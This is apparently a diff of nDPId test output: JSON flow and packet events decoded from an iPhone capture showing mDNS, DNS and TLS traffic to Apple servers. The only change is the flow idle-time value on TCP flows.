00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"AQBeAAD7xGGLNYKpCABFAABemlUAAP8RfYTAqAIR4AAA+xTpFOkASu+LAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"} 00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598385,"flow_last_seen":1582454598385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598385,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454598385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598385,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZE\/AqAIREYICLsWRAbsZOusXAAAAALDC\/\/+bAAAAAgQFtAEDAwcBAQgKEd\/nUwAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598387,"flow_last_seen":1582454598387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598387,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598385,"flow_last_seen":1582454598385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598385,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454598385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598385,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZE\/AqAIREYICLsWRAbsZOusXAAAAALDC\/\/+bAAAAAgQFtAEDAwcBAQgKEd\/nUwAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598387,"flow_last_seen":1582454598387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598387,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAADIRW8AAEARr1PAqAIBwKgCEQA12KEAtAJjFxuBgAABAAUAAAAABG1lc3UFYXBwbGUDY29tAAABAAHADAAFAAEAAAfrAB8IbWVzdS1jZG4FYXBwbGUDY29tBmFrYWRucwNuZXQAwCwABQABAAAMoAAYCG1lc3UtY2RuDG9yaWdpbi1hcHBsZcA7wFcABQABAAAARAARBG1lc3UBZwdhYXBsaW1nwBfAewABAAEAAAAPAAQR\/WnKwHsAAQABAAAADwAEEf01yw=="} 00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="} 